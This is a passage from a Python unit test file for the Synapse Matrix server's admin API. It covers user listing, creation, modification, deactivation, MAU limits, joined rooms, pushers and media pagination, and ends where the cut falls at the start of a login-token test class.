        self.assertEqual("@bob:test", channel.json_body["user_id"])
class UsersListTestCase(unittest.HomeserverTestCase):
    """Tests for listing users via ``/_synapse/admin/v2/users``."""

    servlets = [
        synapse.rest.admin.register_servlets,
        login.register_servlets,
    ]
    url = "/_synapse/admin/v2/users"

    def prepare(self, reactor, clock, hs):
        # One admin (the requester) plus two regular users to be listed.
        self.admin_user = self.register_user("admin", "pass", admin=True)
        self.admin_user_tok = self.login("admin", "pass")

        self.register_user("user1", "pass1", admin=False)
        self.register_user("user2", "pass2", admin=False)

    def test_no_auth(self):
        """
        Try to list users without authentication.
        """
        request, channel = self.make_request("GET", self.url, b"{}")

        self.assertEqual(401, int(channel.result["code"]), msg=channel.result["body"])
        self.assertEqual("M_MISSING_TOKEN", channel.json_body["errcode"])

    def test_all_users(self):
        """
        List all users, including deactivated users.
        """
        request, channel = self.make_request(
            "GET",
            self.url + "?deactivated=true",
            b"{}",
            access_token=self.admin_user_tok,
        )

        self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
        # admin + user1 + user2
        self.assertEqual(3, len(channel.json_body["users"]))
        self.assertEqual(3, channel.json_body["total"])
class UserRestTestCase(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
sync.register_servlets,
]
def prepare(self, reactor, clock, hs):
    """Set up an admin account (the requester) and a regular target user."""
    self.store = hs.get_datastore()

    self.admin_user = self.register_user("admin", "pass", admin=True)
    self.admin_user_tok = self.login("admin", "pass")

    self.other_user = self.register_user("user", "pass")
    self.other_user_token = self.login("user", "pass")
    # quote() guards against special characters in the user id.
    self.url_other_user = "/_synapse/admin/v2/users/%s" % urllib.parse.quote(
        self.other_user
    )
def test_requester_is_no_admin(self):
    """
    If the user is not a server admin, an error is returned.
    """
    url = "/_synapse/admin/v2/users/@bob:test"

    # Both GET and PUT must be rejected for a non-admin requester.
    request, channel = self.make_request(
        "GET", url, access_token=self.other_user_token,
    )

    self.assertEqual(403, int(channel.result["code"]), msg=channel.result["body"])
    self.assertEqual("You are not a server admin", channel.json_body["error"])

    request, channel = self.make_request(
        "PUT", url, access_token=self.other_user_token, content=b"{}",
    )

    self.assertEqual(403, int(channel.result["code"]), msg=channel.result["body"])
    self.assertEqual("You are not a server admin", channel.json_body["error"])
def test_user_does_not_exist(self):
    """
    Tests that a lookup for a user that does not exist returns a 404
    """
    url = "/_synapse/admin/v2/users/@unknown_person:test"
    request, channel = self.make_request(
        "GET", url, access_token=self.admin_user_tok,
    )

    self.assertEqual(404, channel.code, msg=channel.json_body)
    self.assertEqual("M_NOT_FOUND", channel.json_body["errcode"])
def test_create_server_admin(self):
    """
    Check that a new admin user is created successfully.
    """
    url = "/_synapse/admin/v2/users/@bob:test"

    # Create user (server admin)
    body = json.dumps(
        {
            "password": "abc123",
            "admin": True,
            "displayname": "Bob's name",
            "threepids": [{"medium": "email", "address": "bob@bob.bob"}],
            "avatar_url": None,
        }
    )

    request, channel = self.make_request(
        "PUT",
        url,
        access_token=self.admin_user_tok,
        content=body.encode(encoding="utf_8"),
    )

    # 201 signals a newly created (rather than modified) user.
    self.assertEqual(201, int(channel.result["code"]), msg=channel.result["body"])
    self.assertEqual("@bob:test", channel.json_body["name"])
    self.assertEqual("Bob's name", channel.json_body["displayname"])
    self.assertEqual("email", channel.json_body["threepids"][0]["medium"])
    self.assertEqual("bob@bob.bob", channel.json_body["threepids"][0]["address"])
    self.assertEqual(True, channel.json_body["admin"])

    # Get user
    request, channel = self.make_request(
        "GET", url, access_token=self.admin_user_tok,
    )

    self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
    self.assertEqual("@bob:test", channel.json_body["name"])
    self.assertEqual("Bob's name", channel.json_body["displayname"])
    self.assertEqual("email", channel.json_body["threepids"][0]["medium"])
    self.assertEqual("bob@bob.bob", channel.json_body["threepids"][0]["address"])
    self.assertEqual(True, channel.json_body["admin"])
    self.assertEqual(False, channel.json_body["is_guest"])
    self.assertEqual(False, channel.json_body["deactivated"])
def test_create_user(self):
    """
    Check that a new regular user is created successfully.
    """
    url = "/_synapse/admin/v2/users/@bob:test"

    # Create user
    body = json.dumps(
        {
            "password": "abc123",
            "admin": False,
            "displayname": "Bob's name",
            "threepids": [{"medium": "email", "address": "bob@bob.bob"}],
        }
    )

    request, channel = self.make_request(
        "PUT",
        url,
        access_token=self.admin_user_tok,
        content=body.encode(encoding="utf_8"),
    )

    # 201 signals a newly created (rather than modified) user.
    self.assertEqual(201, int(channel.result["code"]), msg=channel.result["body"])
    self.assertEqual("@bob:test", channel.json_body["name"])
    self.assertEqual("Bob's name", channel.json_body["displayname"])
    self.assertEqual("email", channel.json_body["threepids"][0]["medium"])
    self.assertEqual("bob@bob.bob", channel.json_body["threepids"][0]["address"])
    self.assertEqual(False, channel.json_body["admin"])

    # Get user
    request, channel = self.make_request(
        "GET", url, access_token=self.admin_user_tok,
    )

    self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
    self.assertEqual("@bob:test", channel.json_body["name"])
    self.assertEqual("Bob's name", channel.json_body["displayname"])
    self.assertEqual("email", channel.json_body["threepids"][0]["medium"])
    self.assertEqual("bob@bob.bob", channel.json_body["threepids"][0]["address"])
    self.assertEqual(False, channel.json_body["admin"])
    self.assertEqual(False, channel.json_body["is_guest"])
    self.assertEqual(False, channel.json_body["deactivated"])
@override_config(
    {"limit_usage_by_mau": True, "max_mau_value": 2, "mau_trial_days": 0}
)
def test_create_user_mau_limit_reached_active_admin(self):
    """
    Check that an admin can register a new user via the admin API
    even if the MAU limit is reached.
    Admin user was active before creating user.
    """
    handler = self.hs.get_registration_handler()

    # Sync to set admin user to active
    # before limit of monthly active users is reached
    request, channel = self.make_request(
        "GET", "/sync", access_token=self.admin_user_tok
    )

    if channel.code != 200:
        raise HttpResponseException(
            channel.code, channel.result["reason"], channel.result["body"]
        )

    # Set monthly active users to the limit
    self.store.get_monthly_active_count = Mock(
        return_value=make_awaitable(self.hs.config.max_mau_value)
    )
    # Check that the blocking of monthly active users is working as expected
    # The registration of a new user fails due to the limit
    self.get_failure(
        handler.register_user(localpart="local_part"), ResourceLimitError
    )

    # Register new user with admin API
    url = "/_synapse/admin/v2/users/@bob:test"

    # Create user
    body = json.dumps({"password": "abc123", "admin": False})

    request, channel = self.make_request(
        "PUT",
        url,
        access_token=self.admin_user_tok,
        content=body.encode(encoding="utf_8"),
    )

    self.assertEqual(201, int(channel.result["code"]), msg=channel.result["body"])
    self.assertEqual("@bob:test", channel.json_body["name"])
    self.assertEqual(False, channel.json_body["admin"])
@override_config(
    {"limit_usage_by_mau": True, "max_mau_value": 2, "mau_trial_days": 0}
)
def test_create_user_mau_limit_reached_passive_admin(self):
    """
    Check that an admin can register a new user via the admin API
    even if the MAU limit is reached.
    Admin user was not active before creating user.
    """
    handler = self.hs.get_registration_handler()

    # Set monthly active users to the limit
    self.store.get_monthly_active_count = Mock(
        return_value=make_awaitable(self.hs.config.max_mau_value)
    )
    # Check that the blocking of monthly active users is working as expected
    # The registration of a new user fails due to the limit
    self.get_failure(
        handler.register_user(localpart="local_part"), ResourceLimitError
    )

    # Register new user with admin API
    url = "/_synapse/admin/v2/users/@bob:test"

    # Create user
    body = json.dumps({"password": "abc123", "admin": False})

    request, channel = self.make_request(
        "PUT",
        url,
        access_token=self.admin_user_tok,
        content=body.encode(encoding="utf_8"),
    )

    # Admin user is not blocked by mau anymore
    self.assertEqual(201, int(channel.result["code"]), msg=channel.result["body"])
    self.assertEqual("@bob:test", channel.json_body["name"])
    self.assertEqual(False, channel.json_body["admin"])
@override_config(
    {
        "email": {
            "enable_notifs": True,
            "notif_for_new_users": True,
            "notif_from": "test@example.com",
        },
        "public_baseurl": "https://example.com",
    }
)
def test_create_user_email_notif_for_new_users(self):
    """
    Check that a new regular user is created successfully and
    got an email pusher.
    """
    url = "/_synapse/admin/v2/users/@bob:test"

    # Create user
    body = json.dumps(
        {
            "password": "abc123",
            "threepids": [{"medium": "email", "address": "bob@bob.bob"}],
        }
    )

    request, channel = self.make_request(
        "PUT",
        url,
        access_token=self.admin_user_tok,
        content=body.encode(encoding="utf_8"),
    )

    self.assertEqual(201, int(channel.result["code"]), msg=channel.result["body"])
    self.assertEqual("@bob:test", channel.json_body["name"])
    self.assertEqual("email", channel.json_body["threepids"][0]["medium"])
    self.assertEqual("bob@bob.bob", channel.json_body["threepids"][0]["address"])

    # With notif_for_new_users enabled, exactly one pusher is expected.
    pushers = self.get_success(
        self.store.get_pushers_by({"user_name": "@bob:test"})
    )
    pushers = list(pushers)
    self.assertEqual(len(pushers), 1)
    self.assertEqual("@bob:test", pushers[0]["user_name"])
@override_config(
    {
        "email": {
            "enable_notifs": False,
            "notif_for_new_users": False,
            "notif_from": "test@example.com",
        },
        "public_baseurl": "https://example.com",
    }
)
def test_create_user_email_no_notif_for_new_users(self):
    """
    Check that a new regular user is created successfully and
    got not an email pusher.
    """
    url = "/_synapse/admin/v2/users/@bob:test"

    # Create user
    body = json.dumps(
        {
            "password": "abc123",
            "threepids": [{"medium": "email", "address": "bob@bob.bob"}],
        }
    )

    request, channel = self.make_request(
        "PUT",
        url,
        access_token=self.admin_user_tok,
        content=body.encode(encoding="utf_8"),
    )

    self.assertEqual(201, int(channel.result["code"]), msg=channel.result["body"])
    self.assertEqual("@bob:test", channel.json_body["name"])
    self.assertEqual("email", channel.json_body["threepids"][0]["medium"])
    self.assertEqual("bob@bob.bob", channel.json_body["threepids"][0]["address"])

    # With notifications disabled, no pusher should have been created.
    pushers = self.get_success(
        self.store.get_pushers_by({"user_name": "@bob:test"})
    )
    pushers = list(pushers)
    self.assertEqual(len(pushers), 0)
def test_set_password(self):
    """
    Test setting a new password for another user.
    """
    new_password = json.dumps({"password": "hahaha"}).encode(encoding="utf_8")

    request, channel = self.make_request(
        "PUT",
        self.url_other_user,
        access_token=self.admin_user_tok,
        content=new_password,
    )

    self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
def test_set_displayname(self):
    """
    Test setting the displayname of another user.
    """
    # Modify user
    body = json.dumps({"displayname": "foobar"})

    request, channel = self.make_request(
        "PUT",
        self.url_other_user,
        access_token=self.admin_user_tok,
        content=body.encode(encoding="utf_8"),
    )

    self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
    self.assertEqual("@user:test", channel.json_body["name"])
    self.assertEqual("foobar", channel.json_body["displayname"])

    # Get user
    request, channel = self.make_request(
        "GET", self.url_other_user, access_token=self.admin_user_tok,
    )

    self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
    self.assertEqual("@user:test", channel.json_body["name"])
    self.assertEqual("foobar", channel.json_body["displayname"])
def test_set_threepid(self):
    """
    Test setting threepid for an other user.
    """
    # Delete old and add new threepid to user
    body = json.dumps(
        {"threepids": [{"medium": "email", "address": "bob3@bob.bob"}]}
    )

    request, channel = self.make_request(
        "PUT",
        self.url_other_user,
        access_token=self.admin_user_tok,
        content=body.encode(encoding="utf_8"),
    )

    self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
    self.assertEqual("@user:test", channel.json_body["name"])
    self.assertEqual("email", channel.json_body["threepids"][0]["medium"])
    self.assertEqual("bob3@bob.bob", channel.json_body["threepids"][0]["address"])

    # Get user
    request, channel = self.make_request(
        "GET", self.url_other_user, access_token=self.admin_user_tok,
    )

    self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
    self.assertEqual("@user:test", channel.json_body["name"])
    self.assertEqual("email", channel.json_body["threepids"][0]["medium"])
    self.assertEqual("bob3@bob.bob", channel.json_body["threepids"][0]["address"])
def test_deactivate_user(self):
    """
    Test deactivating another user via the admin API, and that the
    deactivated flag is reflected in a subsequent GET.
    """
    # Deactivate user
    body = json.dumps({"deactivated": True})

    request, channel = self.make_request(
        "PUT",
        self.url_other_user,
        access_token=self.admin_user_tok,
        content=body.encode(encoding="utf_8"),
    )

    self.assertEqual(200, channel.code, msg=channel.json_body)
    self.assertEqual("@user:test", channel.json_body["name"])
    self.assertEqual(True, channel.json_body["deactivated"])
    # the user is deactivated, the threepid will be deleted

    # Get user
    request, channel = self.make_request(
        "GET", self.url_other_user, access_token=self.admin_user_tok,
    )

    self.assertEqual(200, channel.code, msg=channel.json_body)
    self.assertEqual("@user:test", channel.json_body["name"])
    self.assertEqual(True, channel.json_body["deactivated"])
def test_reactivate_user(self):
    """
    Test reactivating another user: reactivation without a password is
    rejected with a 400, reactivation with a password succeeds and
    un-erases the user.
    """
    # Deactivate the user.
    request, channel = self.make_request(
        "PUT",
        self.url_other_user,
        access_token=self.admin_user_tok,
        content=json.dumps({"deactivated": True}).encode(encoding="utf_8"),
    )
    self.assertEqual(200, channel.code, msg=channel.json_body)

    # Deactivation alone does not erase the user; erase them explicitly so
    # we can check that reactivation clears the erased flag again.
    self._is_erased("@user:test", False)
    d = self.store.mark_user_erased("@user:test")
    self.assertIsNone(self.get_success(d))
    self._is_erased("@user:test", True)

    # Attempt to reactivate the user (without a password).
    request, channel = self.make_request(
        "PUT",
        self.url_other_user,
        access_token=self.admin_user_tok,
        content=json.dumps({"deactivated": False}).encode(encoding="utf_8"),
    )
    self.assertEqual(400, channel.code, msg=channel.json_body)

    # Reactivate the user.
    request, channel = self.make_request(
        "PUT",
        self.url_other_user,
        access_token=self.admin_user_tok,
        content=json.dumps({"deactivated": False, "password": "foo"}).encode(
            encoding="utf_8"
        ),
    )
    self.assertEqual(200, channel.code, msg=channel.json_body)

    # Get user
    request, channel = self.make_request(
        "GET", self.url_other_user, access_token=self.admin_user_tok,
    )

    self.assertEqual(200, channel.code, msg=channel.json_body)
    self.assertEqual("@user:test", channel.json_body["name"])
    self.assertEqual(False, channel.json_body["deactivated"])
    self._is_erased("@user:test", False)
def test_set_user_as_admin(self):
    """
    Test setting the admin flag on a user, and that the flag is reflected
    in a subsequent GET.
    """
    # Set a user as an admin
    body = json.dumps({"admin": True})

    request, channel = self.make_request(
        "PUT",
        self.url_other_user,
        access_token=self.admin_user_tok,
        content=body.encode(encoding="utf_8"),
    )

    self.assertEqual(200, channel.code, msg=channel.json_body)
    self.assertEqual("@user:test", channel.json_body["name"])
    self.assertEqual(True, channel.json_body["admin"])

    # Get user
    request, channel = self.make_request(
        "GET", self.url_other_user, access_token=self.admin_user_tok,
    )

    self.assertEqual(200, channel.code, msg=channel.json_body)
    self.assertEqual("@user:test", channel.json_body["name"])
    self.assertEqual(True, channel.json_body["admin"])
def test_accidental_deactivation_prevention(self):
    """
    Ensure an account can't accidentally be deactivated by using a str value
    for the deactivated body parameter: the request must be rejected with a
    400 and the account must remain active.
    """
    url = "/_synapse/admin/v2/users/@bob:test"

    # Create user (201 because the PUT creates a new account).
    body = json.dumps({"password": "abc123"})

    request, channel = self.make_request(
        "PUT",
        url,
        access_token=self.admin_user_tok,
        content=body.encode(encoding="utf_8"),
    )

    self.assertEqual(201, channel.code, msg=channel.json_body)
    self.assertEqual("@bob:test", channel.json_body["name"])
    self.assertEqual("bob", channel.json_body["displayname"])

    # Get user
    request, channel = self.make_request(
        "GET", url, access_token=self.admin_user_tok,
    )

    self.assertEqual(200, channel.code, msg=channel.json_body)
    self.assertEqual("@bob:test", channel.json_body["name"])
    self.assertEqual("bob", channel.json_body["displayname"])
    self.assertEqual(0, channel.json_body["deactivated"])

    # Change password (and use a str for deactivate instead of a bool)
    body = json.dumps({"password": "abc123", "deactivated": "false"})  # oops!

    request, channel = self.make_request(
        "PUT",
        url,
        access_token=self.admin_user_tok,
        content=body.encode(encoding="utf_8"),
    )

    self.assertEqual(400, channel.code, msg=channel.json_body)

    # Check user is not deactivated
    request, channel = self.make_request(
        "GET", url, access_token=self.admin_user_tok,
    )

    self.assertEqual(200, channel.code, msg=channel.json_body)
    self.assertEqual("@bob:test", channel.json_body["name"])
    self.assertEqual("bob", channel.json_body["displayname"])

    # Ensure they're still alive
    self.assertEqual(0, channel.json_body["deactivated"])
def _is_erased(self, user_id, expect):
    """Assert that the given user is (expect=True) or is not (expect=False)
    marked as erased in the datastore."""
    erased = self.get_success(self.store.is_user_erased(user_id))
    if expect:
        self.assertTrue(erased)
    else:
        self.assertFalse(erased)
class UserMembershipRestTestCase(unittest.HomeserverTestCase):
    """Tests for the admin API that lists the rooms a user has joined:
    `/_synapse/admin/v1/users/<user_id>/joined_rooms`."""

    servlets = [
        synapse.rest.admin.register_servlets,
        login.register_servlets,
        room.register_servlets,
    ]

    def prepare(self, reactor, clock, hs):
        self.store = hs.get_datastore()

        self.admin_user = self.register_user("admin", "pass", admin=True)
        self.admin_user_tok = self.login("admin", "pass")

        self.other_user = self.register_user("user", "pass")
        self.url = "/_synapse/admin/v1/users/%s/joined_rooms" % urllib.parse.quote(
            self.other_user
        )

    def test_no_auth(self):
        """
        Try to list rooms of a user without authentication.
        """
        request, channel = self.make_request("GET", self.url, b"{}")

        self.assertEqual(401, channel.code, msg=channel.json_body)
        self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])

    def test_requester_is_no_admin(self):
        """
        If the user is not a server admin, an error is returned.
        """
        other_user_token = self.login("user", "pass")

        request, channel = self.make_request(
            "GET", self.url, access_token=other_user_token,
        )

        self.assertEqual(403, channel.code, msg=channel.json_body)
        self.assertEqual(Codes.FORBIDDEN, channel.json_body["errcode"])

    def test_user_does_not_exist(self):
        """
        Tests that a lookup for a user that does not exist returns a 404
        """
        url = "/_synapse/admin/v1/users/@unknown_person:test/joined_rooms"
        request, channel = self.make_request(
            "GET", url, access_token=self.admin_user_tok,
        )

        self.assertEqual(404, channel.code, msg=channel.json_body)
        self.assertEqual(Codes.NOT_FOUND, channel.json_body["errcode"])

    def test_user_is_not_local(self):
        """
        Tests that a lookup for a user that is not local returns a 400
        """
        url = "/_synapse/admin/v1/users/@unknown_person:unknown_domain/joined_rooms"

        request, channel = self.make_request(
            "GET", url, access_token=self.admin_user_tok,
        )

        self.assertEqual(400, channel.code, msg=channel.json_body)
        self.assertEqual("Can only lookup local users", channel.json_body["error"])

    def test_no_memberships(self):
        """
        Tests that a normal lookup for rooms succeeds
        if the user has no memberships.
        """
        # Get rooms
        request, channel = self.make_request(
            "GET", self.url, access_token=self.admin_user_tok,
        )

        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(0, channel.json_body["total"])
        self.assertEqual(0, len(channel.json_body["joined_rooms"]))

    def test_get_rooms(self):
        """
        Tests that a normal lookup for rooms succeeds.
        """
        # Create rooms and join
        other_user_tok = self.login("user", "pass")
        number_rooms = 5
        for n in range(number_rooms):
            self.helper.create_room_as(self.other_user, tok=other_user_tok)

        # Get rooms
        request, channel = self.make_request(
            "GET", self.url, access_token=self.admin_user_tok,
        )

        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(number_rooms, channel.json_body["total"])
        self.assertEqual(number_rooms, len(channel.json_body["joined_rooms"]))
class PushersRestTestCase(unittest.HomeserverTestCase):
    """Tests for the admin API that lists a user's pushers:
    `/_synapse/admin/v1/users/<user_id>/pushers`."""

    servlets = [
        synapse.rest.admin.register_servlets,
        login.register_servlets,
    ]

    def prepare(self, reactor, clock, hs):
        self.store = hs.get_datastore()

        self.admin_user = self.register_user("admin", "pass", admin=True)
        self.admin_user_tok = self.login("admin", "pass")

        self.other_user = self.register_user("user", "pass")
        self.url = "/_synapse/admin/v1/users/%s/pushers" % urllib.parse.quote(
            self.other_user
        )

    def test_no_auth(self):
        """
        Try to list pushers of a user without authentication.
        """
        request, channel = self.make_request("GET", self.url, b"{}")

        self.assertEqual(401, channel.code, msg=channel.json_body)
        self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])

    def test_requester_is_no_admin(self):
        """
        If the user is not a server admin, an error is returned.
        """
        other_user_token = self.login("user", "pass")

        request, channel = self.make_request(
            "GET", self.url, access_token=other_user_token,
        )

        self.assertEqual(403, channel.code, msg=channel.json_body)
        self.assertEqual(Codes.FORBIDDEN, channel.json_body["errcode"])

    def test_user_does_not_exist(self):
        """
        Tests that a lookup for a user that does not exist returns a 404
        """
        url = "/_synapse/admin/v1/users/@unknown_person:test/pushers"
        request, channel = self.make_request(
            "GET", url, access_token=self.admin_user_tok,
        )

        self.assertEqual(404, channel.code, msg=channel.json_body)
        self.assertEqual(Codes.NOT_FOUND, channel.json_body["errcode"])

    def test_user_is_not_local(self):
        """
        Tests that a lookup for a user that is not local returns a 400
        """
        url = "/_synapse/admin/v1/users/@unknown_person:unknown_domain/pushers"

        request, channel = self.make_request(
            "GET", url, access_token=self.admin_user_tok,
        )

        self.assertEqual(400, channel.code, msg=channel.json_body)
        self.assertEqual("Can only lookup local users", channel.json_body["error"])

    def test_get_pushers(self):
        """
        Tests that a normal lookup for pushers succeeds: the list is empty
        before a pusher is registered, and contains the expected fields after.
        """
        # Get pushers (none registered yet)
        request, channel = self.make_request(
            "GET", self.url, access_token=self.admin_user_tok,
        )

        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(0, channel.json_body["total"])

        # Register the pusher
        other_user_token = self.login("user", "pass")
        user_tuple = self.get_success(
            self.store.get_user_by_access_token(other_user_token)
        )
        token_id = user_tuple.token_id

        self.get_success(
            self.hs.get_pusherpool().add_pusher(
                user_id=self.other_user,
                access_token=token_id,
                kind="http",
                app_id="m.http",
                app_display_name="HTTP Push Notifications",
                device_display_name="pushy push",
                pushkey="a@example.com",
                lang=None,
                data={"url": "example.com"},
            )
        )

        # Get pushers
        request, channel = self.make_request(
            "GET", self.url, access_token=self.admin_user_tok,
        )

        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(1, channel.json_body["total"])

        for p in channel.json_body["pushers"]:
            self.assertIn("pushkey", p)
            self.assertIn("kind", p)
            self.assertIn("app_id", p)
            self.assertIn("app_display_name", p)
            self.assertIn("device_display_name", p)
            self.assertIn("profile_tag", p)
            self.assertIn("lang", p)
            self.assertIn("url", p["data"])
class UserMediaRestTestCase(unittest.HomeserverTestCase):
    """Tests for the admin API that lists a user's uploaded media, including
    its pagination parameters: `/_synapse/admin/v1/users/<user_id>/media`."""

    servlets = [
        synapse.rest.admin.register_servlets,
        login.register_servlets,
    ]

    def prepare(self, reactor, clock, hs):
        self.store = hs.get_datastore()
        self.media_repo = hs.get_media_repository_resource()

        self.admin_user = self.register_user("admin", "pass", admin=True)
        self.admin_user_tok = self.login("admin", "pass")

        self.other_user = self.register_user("user", "pass")
        self.url = "/_synapse/admin/v1/users/%s/media" % urllib.parse.quote(
            self.other_user
        )

    def test_no_auth(self):
        """
        Try to list media of a user without authentication.
        """
        request, channel = self.make_request("GET", self.url, b"{}")

        self.assertEqual(401, channel.code, msg=channel.json_body)
        self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])

    def test_requester_is_no_admin(self):
        """
        If the user is not a server admin, an error is returned.
        """
        other_user_token = self.login("user", "pass")

        request, channel = self.make_request(
            "GET", self.url, access_token=other_user_token,
        )

        self.assertEqual(403, channel.code, msg=channel.json_body)
        self.assertEqual(Codes.FORBIDDEN, channel.json_body["errcode"])

    def test_user_does_not_exist(self):
        """
        Tests that a lookup for a user that does not exist returns a 404
        """
        url = "/_synapse/admin/v1/users/@unknown_person:test/media"
        request, channel = self.make_request(
            "GET", url, access_token=self.admin_user_tok,
        )

        self.assertEqual(404, channel.code, msg=channel.json_body)
        self.assertEqual(Codes.NOT_FOUND, channel.json_body["errcode"])

    def test_user_is_not_local(self):
        """
        Tests that a lookup for a user that is not local returns a 400
        """
        url = "/_synapse/admin/v1/users/@unknown_person:unknown_domain/media"

        request, channel = self.make_request(
            "GET", url, access_token=self.admin_user_tok,
        )

        self.assertEqual(400, channel.code, msg=channel.json_body)
        self.assertEqual("Can only lookup local users", channel.json_body["error"])

    def test_limit(self):
        """
        Testing list of media with limit
        """
        number_media = 20
        other_user_tok = self.login("user", "pass")
        self._create_media(other_user_tok, number_media)

        request, channel = self.make_request(
            "GET", self.url + "?limit=5", access_token=self.admin_user_tok,
        )

        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(channel.json_body["total"], number_media)
        self.assertEqual(len(channel.json_body["media"]), 5)
        self.assertEqual(channel.json_body["next_token"], 5)
        self._check_fields(channel.json_body["media"])

    def test_from(self):
        """
        Testing list of media with a defined starting point (from)
        """
        number_media = 20
        other_user_tok = self.login("user", "pass")
        self._create_media(other_user_tok, number_media)

        request, channel = self.make_request(
            "GET", self.url + "?from=5", access_token=self.admin_user_tok,
        )

        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(channel.json_body["total"], number_media)
        self.assertEqual(len(channel.json_body["media"]), 15)
        self.assertNotIn("next_token", channel.json_body)
        self._check_fields(channel.json_body["media"])

    def test_limit_and_from(self):
        """
        Testing list of media with a defined starting point and limit
        """
        number_media = 20
        other_user_tok = self.login("user", "pass")
        self._create_media(other_user_tok, number_media)

        request, channel = self.make_request(
            "GET", self.url + "?from=5&limit=10", access_token=self.admin_user_tok,
        )

        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(channel.json_body["total"], number_media)
        self.assertEqual(channel.json_body["next_token"], 15)
        self.assertEqual(len(channel.json_body["media"]), 10)
        self._check_fields(channel.json_body["media"])

    def test_limit_is_negative(self):
        """
        Testing that a negative limit parameter returns a 400
        """
        request, channel = self.make_request(
            "GET", self.url + "?limit=-5", access_token=self.admin_user_tok,
        )

        self.assertEqual(400, channel.code, msg=channel.json_body)
        self.assertEqual(Codes.INVALID_PARAM, channel.json_body["errcode"])

    def test_from_is_negative(self):
        """
        Testing that a negative from parameter returns a 400
        """
        request, channel = self.make_request(
            "GET", self.url + "?from=-5", access_token=self.admin_user_tok,
        )

        self.assertEqual(400, channel.code, msg=channel.json_body)
        self.assertEqual(Codes.INVALID_PARAM, channel.json_body["errcode"])

    def test_next_token(self):
        """
        Testing that `next_token` appears at the right place
        """
        number_media = 20
        other_user_tok = self.login("user", "pass")
        self._create_media(other_user_tok, number_media)

        # `next_token` does not appear
        # Number of results is the number of entries
        request, channel = self.make_request(
            "GET", self.url + "?limit=20", access_token=self.admin_user_tok,
        )

        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(channel.json_body["total"], number_media)
        self.assertEqual(len(channel.json_body["media"]), number_media)
        self.assertNotIn("next_token", channel.json_body)

        # `next_token` does not appear
        # Number of max results is larger than the number of entries
        request, channel = self.make_request(
            "GET", self.url + "?limit=21", access_token=self.admin_user_tok,
        )

        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(channel.json_body["total"], number_media)
        self.assertEqual(len(channel.json_body["media"]), number_media)
        self.assertNotIn("next_token", channel.json_body)

        # `next_token` does appear
        # Number of max results is smaller than the number of entries
        request, channel = self.make_request(
            "GET", self.url + "?limit=19", access_token=self.admin_user_tok,
        )

        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(channel.json_body["total"], number_media)
        self.assertEqual(len(channel.json_body["media"]), 19)
        self.assertEqual(channel.json_body["next_token"], 19)

        # Set `from` to the value of `next_token` to request the remaining
        # entries; `next_token` must not appear on the final page.
        request, channel = self.make_request(
            "GET", self.url + "?from=19", access_token=self.admin_user_tok,
        )

        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(channel.json_body["total"], number_media)
        self.assertEqual(len(channel.json_body["media"]), 1)
        self.assertNotIn("next_token", channel.json_body)

    def test_user_has_no_media(self):
        """
        Tests that a normal lookup for media succeeds
        if the user has no media created.
        """
        request, channel = self.make_request(
            "GET", self.url, access_token=self.admin_user_tok,
        )

        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(0, channel.json_body["total"])
        self.assertEqual(0, len(channel.json_body["media"]))

    def test_get_media(self):
        """
        Tests that a normal lookup for media succeeds.
        """
        number_media = 5
        other_user_tok = self.login("user", "pass")
        self._create_media(other_user_tok, number_media)

        request, channel = self.make_request(
            "GET", self.url, access_token=self.admin_user_tok,
        )

        self.assertEqual(200, channel.code, msg=channel.json_body)
        self.assertEqual(number_media, channel.json_body["total"])
        self.assertEqual(number_media, len(channel.json_body["media"]))
        self.assertNotIn("next_token", channel.json_body)
        self._check_fields(channel.json_body["media"])

    def _create_media(self, user_token, number_media):
        """
        Upload `number_media` copies of a small test image as the given user.
        """
        upload_resource = self.media_repo.children[b"upload"]
        for i in range(number_media):
            # A minimal 1x1 PNG; file size is 67 bytes.
            image_data = unhexlify(
                b"89504e470d0a1a0a0000000d4948445200000001000000010806"
                b"0000001f15c4890000000a49444154789c63000100000500010d"
                b"0a2db40000000049454e44ae426082"
            )

            # Upload some media into the room
            self.helper.upload_media(
                upload_resource, image_data, tok=user_token, expect_code=200
            )

    def _check_fields(self, content):
        """Checks that all expected attributes are present on each media entry."""
        for m in content:
            self.assertIn("media_id", m)
            self.assertIn("media_type", m)
            self.assertIn("media_length", m)
            self.assertIn("upload_name", m)
            self.assertIn("created_ts", m)
            self.assertIn("last_access_ts", m)
            self.assertIn("quarantined_by", m)
            self.assertIn("safe_from_quarantine", m)
class UserTokenRestTestCase(unittest.HomeserverTestCase):
    """Test for /_synapse/admin/v1/users/<user>/login

    Covers issuing a "puppet" access token for another user and the
    interaction of that token with devices, logout, consent and MAU limits.
    """

    servlets = [
        synapse.rest.admin.register_servlets,
        login.register_servlets,
        sync.register_servlets,
        room.register_servlets,
        devices.register_servlets,
        logout.register_servlets,
    ]

    def prepare(self, reactor, clock, hs):
        self.store = hs.get_datastore()

        self.admin_user = self.register_user("admin", "pass", admin=True)
        self.admin_user_tok = self.login("admin", "pass")

        self.other_user = self.register_user("user", "pass")
        self.other_user_tok = self.login("user", "pass")
        self.url = "/_synapse/admin/v1/users/%s/login" % urllib.parse.quote(
            self.other_user
        )

    def _get_token(self) -> str:
